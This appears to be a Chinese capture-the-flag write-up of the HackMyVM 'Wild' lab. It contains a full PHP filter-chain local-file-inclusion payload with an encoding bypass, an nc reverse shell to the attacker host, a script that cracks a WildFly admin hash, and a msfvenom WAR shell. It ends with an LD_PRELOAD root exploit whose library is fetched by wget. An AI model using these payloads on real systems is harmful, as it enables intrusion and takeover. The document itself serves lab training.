[HackMyVM]靶场 Wild

kali:192.168.56.104

主机发现

arp-scan -l
# arp-scan -l   
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:05       (Unknown: locally administered)
192.168.56.100  08:00:27:6d:81:6c       PCS Systemtechnik GmbH
192.168.56.115  08:00:27:7e:15:a4       PCS Systemtechnik GmbH

靶机:192.168.56.115

nmap  192.168.56.115
# nmap 192.168.56.115       
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-06 11:11 CST
Nmap scan report for 192.168.56.115
Host is up (0.00040s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8080/tcp open  http-proxy
8443/tcp open  https-alt

开启了 22 80 8080 8443端口

扫一下目录

gobuster dir -u http://192.168.56.115 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirb/common.txt
/about.php            (Status: 200) [Size: 3]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.115/css/]
/fonts                (Status: 301) [Size: 316] [--> http://192.168.56.115/fonts/]
/images               (Status: 301) [Size: 317] [--> http://192.168.56.115/images/]
/index.php            (Status: 200) [Size: 19390]
/index.php            (Status: 200) [Size: 19390]
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.115/js/]

有个php文件

fuzz一下参数

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u 'http://192.168.56.115/about.php?FUZZ=/etc/passwd' -fs 0

没爆出来

去界面探测一下信息

菜单里面只有recipes能点

注意url

http://192.168.56.115/recipe.php?file=fatty-burger.php

猜测可能有文件包含

禁止目录穿越

root:x:0:0:root:/root:/usr/bin/zsh daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin _apt:x:42:65534::/nonexistent:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin messagebus:x:100:107::/nonexistent:/usr/sbin/nologin avahi-autoipd:x:101:109:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin sshd:x:102:65534::/run/sshd:/usr/sbin/nologin dnsmasq:x:103:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin polkitd:x:996:996:polkit:/nonexistent:/usr/sbin/nologin tod:x:1002:1002:,,,:/home/tod:/bin/zsh

可以看到有root ,tod用户

伪协议成功读取

直接读取recipe.php读取不出来

用filter过滤器

http://192.168.56.115/recipe.php?file=php://filter/read=convert.base64-encode/resource=recipe.php

<!DOCTYPE html>
<html lang="fr">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Food</title><link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" /><link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css" /><link rel="stylesheet" href="css/flaticon.css" /><link rel="stylesheet" href="css/animate.css"><link rel="stylesheet" href="css/bootsnav.css"><link rel="stylesheet" href="css/color.css"><link rel="stylesheet" href="css/custom.css" />
</head>
<body data-spy="scroll" data-target="#navbar-menu" data-offset="100"><nav class="navbar navbar-default bootsnav no-background navbar-fixed black"><div class="container"><div class="navbar-header"><a class="navbar-brand" href="#"><img src="images/logo.png" class="logo" alt=""></a></div></div></nav><section id="block"><div class="container"><div class="row"><div class="col-md-8 col-md-offset-2"><div class="feature"><h1>Welcome !</h1><p style="color: red; font-weight: bold;font-size: 24px;">Choose a recipe :</p><ul class="list-group"><li class="list-group-item"><a href="?file=fatty-burger.php">Fatty Burger</a></li><li class="list-group-item"><a href="?file=shack-burger.php">Shack Burger</a></li><li class="list-group-item"><a href="?file=cheddar-burger.php">Cheddar Junky Stuffed Burgers</a></li></ul></div></div></div></div></section><script src="http://code.jquery.com/jquery-1.12.1.min.js"></script><script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script><script src="js/bootsnav.js"></script>
</body>
</html><?php
ini_set('allow_url_include', '0');function isForbidden($input) {return stripos($input, "iconv") !== false;
}if(isset($_GET['file'])) {$file = $_GET['file'];if (isForbidden($file)) {echo "<div class='container'><div class='alert alert-danger'>Access denied !</div></div>";} elseif (strncmp($file, "/", 1) !== 0 && strncmp($file, "..", 2) !== 0) {@include($file);} else {echo "<div class='container'><div class='alert alert-danger'>Access denied !</div></div>";}
}
?>

得到的源码经过base64解码得到如上

看下面的php源码,知道网页对iconv,/,..进行了过滤

现在想想该如何利用LFI进行RCE

利用搜索引擎 搜索关键词LFI filter RCE得到两篇文章

通过 PHP 过滤器LFI2RCE - HackTricks

synacktiv/php_filter_chain_generator (github.com)

有个工具能生成php chain

php_filter_chain_generator.py
 python .\php_filter_chain_generator.py --chain '<?=`$_GET[0]` ?>'
[+] The following gadget chain will generate the following code : <?=`$_GET[0]` ?> (base64 value: PD89YCRfR0VUWzBdYCA/Pg)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp

又因为源码中过滤了iconv,可以进行双重编码绕过

i的16进制编码是%69,%的16进制编码是25,所以可以用%2569表示i

php://filter/convert.%2569conv.UTF8.CSISO2022KR|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.SE2.UTF-16|convert.%2569conv.CSIBM921.NAPLPS|convert.%2569conv.855.CP936|convert.%2569conv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.SE2.UTF-16|convert.%2569conv.CSIBM1161.IBM-932|convert.%2569conv.MS932.MS936|convert.%2569conv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.IBM869.UTF16|convert.%2569conv.L3.CSISO90|convert.%2569conv.UCS2.UTF-8|convert.%2569conv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.8859_3.UTF16|convert.%2569conv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CP367.UTF-16|convert.%2569conv.CSIBM901.SHIFT_JISX0213|convert.%2569conv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.INIS.UTF16|convert.%2569conv.CSIBM1133.IBM943|convert.%2569conv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CP861.UTF-16|convert.%2569conv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.865.UTF16|convert.%2569conv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.SE2.UTF-16|convert.%2569conv.CSIBM1161.IBM-932|convert.%2569conv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.INIS.UTF16|convert.%2569conv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CP861.UTF-16|convert.%2569conv.L4.GB13000|convert.%2569conv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.UTF8.UTF16LE|convert.%2569conv.UTF8.CSISO2022KR|convert.%2569conv.UCS2.UTF8|convert.%2569conv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.PT.UTF32|convert.%2569conv.KOI8-U.IBM-932|convert.%2569conv.SJIS.EUCJP-WIN|convert.%2569conv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CP367.UTF-16|convert.%2569conv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.PT.UTF32|convert.%2569conv.KOI8-U.IBM-932|convert.%2569conv.SJIS.EUCJP-WIN|convert.%2569conv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CP367.UTF-16|convert.%2569conv.CSIBM901.SHIFT_JISX0213|convert.%2569conv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CSIBM1161.UNICODE|convert.%2569conv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.ISO2022KR.UTF16|convert.%2569conv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.INIS.UTF16|convert.%2569conv.CSIBM1133.IBM943|convert.%2569conv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.SE2.UTF-16|convert.%2569conv.CSIBM1161.IBM-932|convert.%2569conv.MS932.MS936|convert.%2569conv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.base64-decode/resource=php://temp

payload:

http://192.168.56.115/recipe.php?file=php://filter/convert.%2569conv.UTF8.CSISO2022KR|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.SE2.UTF-16|convert.%2569conv.CSIBM921.NAPLPS|convert.%2569conv.855.CP936|convert.%2569conv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.SE2.UTF-16|convert.%2569conv.CSIBM1161.IBM-932|convert.%2569conv.MS932.MS936|convert.%2569conv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.IBM869.UTF16|convert.%2569conv.L3.CSISO90|convert.%2569conv.UCS2.UTF-8|convert.%2569conv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.8859_3.UTF16|convert.%2569conv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CP367.UTF-16|convert.%2569conv.CSIBM901.SHIFT_JISX0213|convert.%2569conv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.INIS.UTF16|convert.%2569conv.CSIBM1133.IBM943|convert.%2569conv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CP861.UTF-16|convert.%2569conv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.865.UTF16|convert.%2569conv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.SE2.UTF-16|convert.%2569conv.CSIBM1161.IBM-932|convert.%2569conv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.INIS.UTF16|convert.%2569conv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CP861.UTF-16|convert.%2569conv.L4.GB13000|convert.%2569conv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.UTF8.UTF16LE|convert.%2569conv.UTF8.CSISO2022KR|convert.%2569conv.UCS2.UTF8|convert.%2569conv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.PT.UTF32|convert.%2569conv.KOI8-U.IBM-932|convert.%2569conv.SJIS.EUCJP-WIN|convert.%2569conv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CP367.UTF-16|convert.%2569conv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.PT.UTF32|convert.%2569conv.KOI8-U.IBM-932|convert.%2569conv.SJIS.EUCJP-WIN|convert.%2569conv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CP367.UTF-16|convert.%2569conv.CSIBM901.SHIFT_JISX0213|convert.%2569conv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CSIBM1161.UNICODE|convert.%2569conv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.ISO2022KR.UTF16|convert.%2569conv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.INIS.UTF16|convert.%2569conv.CSIBM1133.IBM943|convert.%2569conv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.SE2.UTF-16|convert.%2569conv.CSIBM1161.IBM-932|convert.%2569conv.MS932.MS936|convert.%2569conv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.base64-decode/resource=php://temp&0=whoami

成功执行了命令

反弹个shell

nc+-e+/bin/bash+192.168.56.104+4567

切换到交互shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

拿到www-data的权限并没有什么卵用,里面啥也没有

这个时候就得看一下进程网段

ps auxww
tod          567  0.0  0.1   6932  3404 ?        S    04:06   0:00 /bin/bash /opt/wildfly/bin/wildfly.sh
tod          580  0.0  0.0   2576  1648 ?        S    04:07   0:00 /bin/sh /opt/wildfly/bin/standalone.sh -Djboss.bind.address.management=192.168.56.115 -b 192.168.56.115
tod          684  0.6  9.1 1395088 279568 ?      Sl   04:07   0:37 java -D[Standalone] -Xms64m -Xmx512m -XX:MetaspaceSize=96M -XX:MaxMetaspaceSize=256m -Djava.net.preferIPv4Stack=true -Djboss.modules.system.pkgs=org.jboss.byteman -Djava.awt.headless=true --add-exports=java.desktop/sun.awt=ALL-UNNAMED --add-exports=java.naming/com.sun.jndi.ldap=ALL-UNNAMED --add-exports=java.naming/com.sun.jndi.url.ldap=ALL-UNNAMED --add-exports=java.naming/com.sun.jndi.url.ldaps=ALL-UNNAMED --add-exports=jdk.naming.dns/com.sun.jndi.dns=ALL-UNNAMED --add-opens=java.base/java.lang=ALL-UNNAMED --add-opens=java.base/java.lang.invoke=ALL-UNNAMED --add-opens=java.base/java.lang.reflect=ALL-UNNAMED --add-opens=java.base/java.io=ALL-UNNAMED --add-opens=java.base/java.net=ALL-UNNAMED --add-opens=java.base/java.security=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED --add-opens=java.base/java.util.concurrent=ALL-UNNAMED --add-opens=java.management/javax.management=ALL-UNNAMED --add-opens=java.naming/javax.naming=ALL-UNNAMED -Djava.security.manager=allow -Dorg.jboss.boot.log.file=/opt/wildfly/standalone/log/server.log -Dlogging.configuration=file:/opt/wildfly/standalone/configuration/logging.properties -jar /opt/wildfly/jboss-modules.jar -mp /opt/wildfly/modules org.jboss.as.standalone -Djboss.home.dir=/opt/wildfly -Djboss.server.base.dir=/opt/wildfly/standalone -Djboss.bind.address.management=192.168.56.115 -b 192.168.56.115
ss -lutnp
ss -lutnp
Netid State  Recv-Q Send-Q  Local Address:Port Peer Address:PortProcess
udp   UNCONN 0      0             0.0.0.0:68        0.0.0.0:*          
tcp   LISTEN 0      4096   192.168.56.115:8080      0.0.0.0:*          
tcp   LISTEN 0      50     192.168.56.115:9990      0.0.0.0:*          
tcp   LISTEN 0      128           0.0.0.0:22        0.0.0.0:*          
tcp   LISTEN 0      4096   192.168.56.115:8443      0.0.0.0:*          
tcp   LISTEN 0      128              [::]:22           [::]:*          
tcp   LISTEN 0      511                 *:80              *:*    

看看其他端口

8443打不开

8080

是WildFly服务后台是9990端口

根据进程扫描知道wildfly文件位置/opt/wildfly

扫一下隐私文件

find . -name *user* 2>/dev/null
find . -name *user* 2>/dev/null
./.galleon/hashes/modules/system/layers/base/org/jboss/as/domain-add-user
./standalone/configuration/application-users.properties
./standalone/configuration/mgmt-users.properties
./modules/system/layers/base/org/wildfly/security/elytron-base/main/wildfly-elytron-sasl-localuser-2.2.2.Final.jar
./modules/system/layers/base/org/jboss/as/domain-add-user
./docs/schema/user-roles_1_0.xsd
./bin/add-user.properties
./bin/add-user.sh
./bin/add-user.bat
./bin/add-user.ps1
./domain/configuration/application-users.properties
./domain/configuration/mgmt-users.properties
www-data@wild:/opt/wildfly/domain/configuration$ cat applica*   
cat applica*
cat: application-roles.properties: Permission denied
cat: application-users.properties: Permission denied
www-data@wild:/opt/wildfly/domain/configuration$ cat mgmt*
cat mgmt*
cat: mgmt-groups.properties: Permission denied
#
# Properties declaration of users for the realm 'ManagementRealm' which is the default realm
# for new installations. Further authentication mechanism can be configured
# as part of the <management /> in host.xml.
#
# Users can be added to this properties file at any time, updates after the server has started
# will be automatically detected.
#
# By default the properties realm expects the entries to be in the format: -
# username=HEX( MD5( username ':' realm ':' password))
#
# A utility script is provided which can be executed from the bin folder to add the users: -
# - Linux
#  bin/add-user.sh
#
# - Windows
#  bin\add-user.bat
#
#$REALM_NAME=ManagementRealm$ This line is used by the add-user utility to identify the realm name already used in this file.
#
# On start-up the server will also automatically add a user $local - this user is specifically
# for local tools running against this AS installation.
#
# The following illustrates how an admin user could be defined, this
# is for illustration only and does not correspond to a usable password.
#
administrator=3bfa7f34174555fe766d0e0295821742

 在/domain/configuration/mgmt-users.properties里面发现点东西

username为realm然后再对username:realm:password进行md5加密再转16进制

从下面可以知道用户名为administrator

hash为3bfa7f34174555fe766d0e0295821742

在host-primary.xml里面发现realm name为ManagementRealm

<realm name="ManagementRealm" role-decoder="groups-to-roles"/>

现在可以写个脚本来碰撞一下

import hashlib
username="administrator"
realm="ManagementRealm"
hash_re="3bfa7f34174555fe766d0e0295821742"
with open("/usr/share/eaphammer/wordlists/rockyou.txt",'r',errors="ignore") as file:for passwd in file:passwd=passwd.strip()if hashlib.md5(f"{username}:{realm}:{passwd}".encode()).hexdigest()==hash_re:print(passwd)break
# python a.py
katarina9

爆出密码是katarina9

成功登录上去

上传war文件反弹shell

生成一个

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.56.104 LPORT=4567 -f war > tao.war Scripting Payloads

监听拿到shell

# nc -lvnp 4567          
listening on [any] 4567 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.115] 51206
whoami
tod

拿到user权限

sudo -l查看提权文件

tod@wild:/home/tod$ sudo -l
sudo -l
Matching Defaults entries for tod on wild:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,use_ptyUser tod may run the following commands on wild:(ALL : ALL) SETENV: NOPASSWD: /usr/bin/info

可以通过setenv进行链接库注入

通过LD_PRELOAD在库进行加载的时候添加可以使用的函数

写个c

#include <stdio.h>
#include <stdlib.h>
__attribute__((constructor))
void init()
{setuid(0);setgid(0);unsetenv("LD_PRELOAD");system("/bin/bash");
}

编译

 gcc root.c -shared -fPIC -o root.so

传到靶机

wget http://192.168.56.104:6677/root.so
chmod +x root.so
sudo LD_PRELOAD=/home/tod/root.so /usr/bin/info
wget http://192.168.56.104:6677/root.so
--2024-03-06 06:51:01--  http://192.168.56.104:6677/root.so
Connecting to 192.168.56.104:6677... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15520 (15K) [application/octet-stream]
Saving to: ‘root.so’root.so             100%[===================>]  15.16K  --.-KB/s    in 0.003s  2024-03-06 06:51:01 (5.33 MB/s) - ‘root.so’ saved [15520/15520]tod@wild:/home/tod$ chmod +x root.so
chmod +x root.so
tod@wild:/home/tod$ sudo LD_PRELOAD=/home/tod/root.so /usr/bin/info
sudo LD_PRELOAD=/home/tod/root.so /usr/bin/info
root@wild:/home/tod# whoami
whoami
root
root@wild:/home/tod# ^[^A

拿到root权限!

总结:1.php链从LFI2RCE

        2.进程查看文件目录

        3.war马上传实现webshell

        4.setenv链接库注入提权

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/727121.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

从安卓转战月薪6万的鸿蒙原来这么简单

近年来&#xff0c;各家大厂正在积极布局鸿蒙客户端开发&#xff0c;鸿蒙操作系统备受瞩目&#xff0c;不少安卓开发者纷纷转战鸿蒙&#xff0c;并取得了可观的经济回报。本文将为大家揭示&#xff0c;从安卓转战鸿蒙并获得月薪6万的简单之道&#xff0c;希望能给正在考虑转型的…

YOLOSHOW - YOLOv5 / YOLOv7 / YOLOv8 / YOLOv9 基于 Pyside6 的图形化界面

YOLOSHOW 是一个基于 PySide6&#xff08;Qt for Python&#xff09;开发的图形化界面应用程序&#xff0c;主要用于集成和可视化YOLO系列&#xff08;包括但不限于YOLOv5、YOLOv7、YOLOv8、YOLOv9&#xff09;的目标检测模型。YOLOSHOW 提供了一个用户友好的交互界面&#xff…

POS 之 最终确定性

Gasper Casper 是一种能将特定区块更新为 最终确定 状态的机制&#xff0c;使网络的新加入者确信他们正在同步规范链。当区块链出现多个分叉时&#xff0c;分叉选择算法使用累计投票来确保节点可以轻松选择正确的分叉。 最终确定性 最终确定性是某些区块的属性&#xff0c;意味…

Ajax、Axios、Vue、Element与其案例

目录 一.Ajax 二.Axios 三.Vue 四.Element 五.增删改查案例 一.依赖&#xff1a;数据库&#xff0c;mybatis&#xff0c;servlet&#xff0c;json-对象转换器 二.资源&#xff1a;elementvueaxios 三.pojo 四.mapper.xml与mapper接口 五.service 六.servlet 七.html页…

1909_Arm Cortex-M3编程模型

1909_Arm Cortex-M3编程模型 全部学习汇总&#xff1a; g_arm_cores: ARM内核的学习笔记 (gitee.com) 编程模型的部分除了单独的核心寄存器描述之外&#xff0c;它还包含有关处理器模式和软件执行和堆栈的特权级别的信息。 处理器有两种模式&#xff0c;分别是线程模式和Handle…

揭秘CPU可视化:探索计算机心脏的神秘之旅

在数字化飞速发展的今天&#xff0c;中央处理器&#xff08;CPU&#xff09;作为计算机的心脏&#xff0c;其复杂度和重要性不言而喻。 中央处理器&#xff0c;这个小小的芯片&#xff0c;却承载着计算机运行的所有指令和数据处理任务。它的内部构造复杂而精密&#xff0c;每一…

哪些公司在招聘GIS开发?为什么?

之前我们给大家整理汇总了WebGIS在招岗位的一些特点&#xff0c;包括行业、学历、工作经验等。WebGIS招聘原来看重这个&#xff01;整理了1300多份岗位得出来的干货&#xff01; 很多同学好奇&#xff0c;这些招GIS开发的都是哪些公司&#xff1f;主要是做什么的&#xff1f; …

Cesium 自定义Primitive - 圆

一、创作思路 1、创建一个自定义CustomPrimitive 2、然后根据两个点&#xff0c;生成圆 3、方便后期绘制圆 二、实现代码 1、在vue的包中加入turf. npm install turf/turf 1、创建一个CustomCirclePrimitive类,并加入更新的代码 export default class CustomCirclePrimitive …

【Simulink系列】——控制系统仿真基础

声明&#xff1a;本系列博客参考有关专业书籍&#xff0c;截图均为自己实操&#xff0c;仅供交流学习&#xff01; 一、控制系统基本概念 这里就不再介绍类似于开环系统、闭环系统等基本概念了&#xff01; 1、数学模型 控制系统的数学模型是指动态数学模型&#xff0c;大致…

车辆伤害VR安全教育培训复用性强

VR工地伤害虚拟体验是一种新兴的培训方式&#xff0c;它利用虚拟现实技术为参与者提供身临其境的体验。与传统的培训方式相比&#xff0c;VR工地伤害虚拟体验具有许多优势。 首先&#xff0c;VR工地伤害虚拟体验能够模拟真实的工作环境和事故场景&#xff0c;让参与者在安全的环…

基于单片机的晾衣架控制系统设计

目 录 摘 要 I Abstract II 引 言 1 1 系统方案设计 3 1.1 系统方案论证 3 1.2 系统工作原理 4 2 硬件设计 5 2.1 单片机 5 2.2 按键设计 7 2.3 光线检测模块 8 2.4 雨滴检测模块 9 2.5 电压比较器 10 2.6 微动步进电动机 11 2.7 硬件电路原理图 12 3 系统主要软件设计 14 3.1…

买不到的数目c++

